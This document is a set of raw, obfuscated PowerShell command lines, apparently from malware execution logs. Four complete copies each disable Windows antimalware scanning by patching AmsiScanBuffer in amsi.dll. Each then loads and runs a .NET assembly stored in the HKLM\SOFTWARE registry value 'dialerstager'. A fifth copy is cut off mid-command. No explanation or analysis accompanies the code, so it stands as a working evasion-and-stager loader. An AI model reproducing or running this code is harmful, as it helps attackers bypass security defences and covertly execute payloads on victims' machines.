"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:LYHvwSlQAQLb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JQcZTkNVGoTERK,[Parameter(Position=1)][Type]$JdFQiLEWvf)$aODcYjPAdCF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+'c'+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+'le'+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+'M'+''+'o'+''+[Char](100)+'ul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'T'+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+','+'P'+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+''+'a'+''+'l'+''+'e'+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$aODcYjPAdCF.DefineConstructor(''+'R'+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+'c'+[Char](105)+'a'+'l'+''+[Char](78)+''+'a'+'m'+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+'de'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+'l'+''+'i'+'c',[Reflection.CallingConventions]::Standard,$JQcZTkNVGoTERK).SetImplementationFlags('R'+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+'d');$aODcYjPAdCF.DefineMethod('I'+'n'+''+'v'+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eBy'+[Char](83)+''+'i'+'g,Ne'+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+'irt'+[Char](117)+'al',$JdFQiLEWvf,$JQcZTkNVGoTERK).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $aODcYjPAdCF.CreateType();}$UHIOxRIPgTBiD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'ll')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+'.'+'U'+'n'+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+'N'+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+'e'+[Char](77)+''+[Char](101)+''+'t'+'h'+[Char](111)+''+[Char](100)+'s');$DmuydVAcPiHAfk=$UHIOxRIPgTBiD.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+'r'+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+'re'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+'b'+'lic,S'+[Char](116)+''+[Char](97)+''+'t'+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gHbotmYAYhAPvNlvQwQ=LYHvwSlQAQLb @([String])([IntPtr]);$lkxUUAHcIUyIQRGSbpiDSt=LYHvwSlQAQLb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZpsDZsAHdAy=$UHIOxRIPgTBiD.GetMethod(''+[Char](71)+''+'e'+'t'+'M'+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'H'+[Char](97)+'n'+'d'+''+'l'+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'r'+[Char](110)+'e'+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+'d'+'ll')));$bvCKSpsHERTTKY=$DmuydVAcPiHAfk.Invoke($Null,@([Object]$ZpsDZsAHdAy,[Object](''+[Char](76)+'o'+[Char](97)+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$POIZtBjuVPCpDAzkb=$DmuydVAcPiHAfk.Invoke($Null,@([Object]$ZpsDZsAHdAy,[Object](''+[Char](86)+''+[Char](105)+'rt'+[Char](117)+''+'a'+''+[Char](108)+'P'+[Char](114)+'o'+'t'+''+[Char](101)+''+'c'+'t')));$vAqpECN=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bvCKSpsHERTTKY,$gHbotmYAYhAPvNlvQwQ).Invoke(''+[Char](97)+'m'+[Char](115)+'i.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$RGyNHFWiWxajyukzk=$DmuydVAcPiHAfk.Invoke($Null,@([Object]$vAqpECN,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'an'+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+''+'r'+'')));$PpGioWuJyy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($POIZtBjuVPCpDAzkb,$lkxUUAHcIUyIQRGSbpiDSt).Invoke($RGyNHFWiWxajyukzk,[uint32]8,4,[ref]$PpGioWuJyy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RGyNHFWiWxajyukzk,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($POIZtBjuVPCpDAzkb,$lkxUUAHcIUyIQRGSbpiDSt).Invoke($RGyNHFWiWxajyukzk,[uint32]8,0x20,[ref]$PpGioWuJyy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+'d'+''+[Char](105)+'a'+'l'+''+[Char](101)+'r'+[Char](115)+''+'t'+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:gKUEuxufrQFg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$voGdGbjeFCmlGC,[Parameter(Position=1)][Type]$fbtJqxGKBf)$MZaqtqquVbW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+'M'+'o'+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+'u'+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+'An'+'s'+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MZaqtqquVbW.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+'p'+[Char](101)+''+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+'P'+'ub'+'l'+'ic',[Reflection.CallingConventions]::Standard,$voGdGbjeFCmlGC).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+[Char](44)+'Ma'+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$MZaqtqquVbW.DefineMethod('I'+[Char](110)+''+'v'+''+'o'+''+'k'+''+[Char](101)+'','Pu'+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+'l',$fbtJqxGKBf,$voGdGbjeFCmlGC).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+'i'+[Char](109)+''+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $MZaqtqquVbW.CreateType();}$lMmzvdFKnatKJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+'t'+'e'+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'Un'+'s'+''+'a'+''+'f'+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'ho'+'d'+''+'s'+'');$rvCYYGlHTKzPnb=$lMmzvdFKnatKJ.GetMethod(''+'G'+''+[Char](101)+'tP'+'r'+''+[Char](111)+''+'c'+''+'A'+''+[Char](100)+''+[Char](100)+'r'+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+'a'+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vhjBUoqPgxSuWrkSrrU=gKUEuxufrQFg @([String])([IntPtr]);$facWtZnKNcmnSfqUTPVMON=gKUEuxufrQFg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xZUHPWBgzZr=$lMmzvdFKnatKJ.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'H'+[Char](97)+'n'+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+'n'+'e'+''+[Char](108)+''+[Char](51)+''+'2'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$RybQNUYrFtJBHy=$rvCYYGlHTKzPnb.Invoke($Null,@([Object]$xZUHPWBgzZr,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+'ib'+[Char](114)+''+'a'+''+'r'+''+[Char](121)+''+[Char](65)+'')));$iLJLfPbWXkFiuduBG=$rvCYYGlHTKzPnb.Invoke($Null,@([Object]$xZUHPWBgzZr,[Object](''+'V'+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+'alP'+[Char](114)+''+'o'+'t'+'e'+''+[Char](99)+''+[Char](116)+'')));$CTLvUMV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RybQNUYrFtJBHy,$vhjBUoqPgxSuWrkSrrU).Invoke('a'+[Char](109)+''+'s'+''+'i'+'.'+'d'+''+'l'+'l');$bEhMrHRaxGvsgufCY=$rvCYYGlHTKzPnb.Invoke($Null,@([Object]$CTLvUMV,[Object]('Am'+[Char](115)+'i'+'S'+''+'c'+''+[Char](97)+'nB'+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$CZquZhzOdz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iLJLfPbWXkFiuduBG,$facWtZnKNcmnSfqUTPVMON).Invoke($bEhMrHRaxGvsgufCY,[uint32]8,4,[ref]$CZquZhzOdz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bEhMrHRaxGvsgufCY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iLJLfPbWXkFiuduBG,$facWtZnKNcmnSfqUTPVMON).Invoke($bEhMrHRaxGvsgufCY,[uint32]8,0x20,[ref]$CZquZhzOdz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTW'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+'i'+''+'a'+''+'l'+''+[Char](101)+'rs'+'t'+'ager')).EntryPoint.Invoke($Null,$Null)"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:ifPqUlDPlXMp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$sPaapVBHDuZgFQ,[Parameter(Position=1)][Type]$ksNPTkyWPL)$KIPSwpMpUpE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fl'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+'l'+'eg'+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+'M'+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+'p'+'e','Cl'+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$KIPSwpMpUpE.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+','+[Char](80)+'u'+'b'+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$sPaapVBHDuZgFQ).SetImplementationFlags(''+[Char](82)+''+'u'+'nt'+[Char](105)+''+'m'+'e'+','+'Man'+'a'+''+'g'+''+'e'+'d');$KIPSwpMpUpE.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+'k'+[Char](101)+'','P'+[Char](117)+'b'+'l'+'i'+[Char](99)+''+','+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'ot'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'',$ksNPTkyWPL,$sPaapVBHDuZgFQ).SetImplementationFlags(''+'R'+''+'u'+''+'n'+'t'+'i'+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+'a'+[Char](103)+'e'+'d'+'');Write-Output $KIPSwpMpUpE.CreateType();}$UFysREtrMkpQq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+'ic'+[Char](114)+'os'+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+'n'+''+'s'+''+'a'+'fe'+[Char](78)+''+'a'+'t'+'i'+'v'+'e'+''+[Char](77)+'e'+'t'+'h'+'o'+'d'+'s'+'');$KiYupwCzxovluo=$UFysREtrMkpQq.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'P'+'r'+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$mMKffXcJkImUBOUrDZk=ifPqUlDPlXMp @([String])([IntPtr]);$MjpQxqxkBuhBiqPSJewrEX=ifPqUlDPlXMp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hgLcGtgywPu=$UFysREtrMkpQq.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$zUGChMAniXPxph=$KiYupwCzxovluo.Invoke($Null,@([Object]$hgLcGtgywPu,[Object](''+'L'+''+[Char](111)+'ad'+[Char](76)+''+'i'+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$rkufheSrTSgFwUakF=$KiYupwCzxovluo.Invoke($Null,@([Object]$hgLcGtgywPu,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+''+'o'+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$waCqOcW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zUGChMAniXPxph,$mMKffXcJkImUBOUrDZk).Invoke(''+'a'+''+'m'+''+'s'+''+'i'+''+'.'+''+[Char](100)+''+'l'+''+'l'+'');$LLPgPhxczNYmQSMps=$KiYupwCzxovluo.Invoke($Null,@([Object]$waCqOcW,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$mjpJnWRunM=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rkufheSrTSgFwUakF,$MjpQxqxkBuhBiqPSJewrEX).Invoke($LLPgPhxczNYmQSMps,[uint32]8,4,[ref]$mjpJnWRunM);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LLPgPhxczNYmQSMps,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rkufheSrTSgFwUakF,$MjpQxqxkBuhBiqPSJewrEX).Invoke($LLPgPhxczNYmQSMps,[uint32]8,0x20,[ref]$mjpJnWRunM);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+'E').GetValue(''+[Char](100)+''+'i'+'a'+[Char](108)+'er'+'s'+'t'+'a'+'g'+'e'+'r')).EntryPoint.Invoke($Null,$Null)"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:TolzVhFZxPIC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WXcChpVedUxhAr,[Parameter(Position=1)][Type]$rnFXPiTxwg)$ErPGygIGXMP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+[Char](99)+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+'m'+''+[Char](111)+''+[Char](114)+'yM'+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('My'+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'e'+[Char](84)+''+'y'+'pe',''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+'i'+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+'toC'+'l'+'a'+'s'+''+'s'+'',[MulticastDelegate]);$ErPGygIGXMP.DefineConstructor(''+'R'+''+'T'+'S'+[Char](112)+'e'+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+'N'+'a'+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+','+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$WXcChpVedUxhAr).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+'me,'+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$ErPGygIGXMP.DefineMethod(''+[Char](73)+'nv'+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+''+'N'+'e'+'w'+''+[Char](83)+'l'+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+'r'+'tual',$rnFXPiTxwg,$WXcChpVedUxhAr).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+'M'+'a'+'n'+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $ErPGygIGXMP.CreateType();}$OoNsWDvjOZPly=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+'st'+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+'t.Wi'+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+'a'+'fe'+[Char](78)+'a'+[Char](116)+'iv'+'e'+''+[Char](77)+''+[Char](101)+''+'t'+'h'+[Char](111)+''+[Char](100)+''+'s'+'');$oLHguoRuwzDbHe=$OoNsWDvjOZPly.GetMethod('G'+[Char](101)+''+'t'+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+'ddr'+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+[Char](83)+'t'+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$uFITRoeyMwRpDGuTzGa=TolzVhFZxPIC @([String])([IntPtr]);$fkdzfTcRySvCLaBcAtgiph=TolzVhFZxPIC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jsPaBwtuIkD=$OoNsWDvjOZPly.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+'ul'+'e'+''+[Char](72)+'a'+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+'r'+''+[Char](110)+''+[Char](101)+'l3'+[Char](50)+'.d'+[Char](108)+''+[Char](108)+'')));$lMUYxiXweVgffB=$oLHguoRuwzDbHe.Invoke($Null,@([Object]$jsPaBwtuIkD,[Object](''+[Char](76)+''+'o'+'adL'+[Char](105)+''+'b'+'r'+'a'+'r'+[Char](121)+''+[Char](65)+'')));$lHaXaPyzJrfIBzaPr=$oLHguoRuwzDbHe.Invoke($Null,@([Object]$jsPaBwtuIkD,[Object](''+[Char](86)+''+'i'+''+'r'+'t'+[Char](117)+'a'+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+'ec'+'t'+'')));$oNNFSWq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lMUYxiXweVgffB,$uFITRoeyMwRpDGuTzGa).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+'dl'+[Char](108)+'');$lDfBpEFvRHqaBVUQR=$oLHguoRuwzDbHe.Invoke($Null,@([Object]$oNNFSWq,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+'f'+[Char](101)+''+'r'+'')));$YSdWTdKQuU=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lHaXaPyzJrfIBzaPr,$fkdzfTcRySvCLaBcAtgiph).Invoke($lDfBpEFvRHqaBVUQR,[uint32]8,4,[ref]$YSdWTdKQuU);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$lDfBpEFvRHqaBVUQR,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lHaXaPyzJrfIBzaPr,$fkdzfTcRySvCLaBcAtgiph).Invoke($lDfBpEFvRHqaBVUQR,[uint32]8,0x20,[ref]$YSdWTdKQuU);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+'E'+'').GetValue('d'+'i'+'a'+'l'+''+[Char](101)+''+'r'+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:IYiKntmHJqyr{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$GMdcfETqxhVXhb,[Parameter(Position=1)][Type]$JYumfywPrD)$zkBlsUcCTGg=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 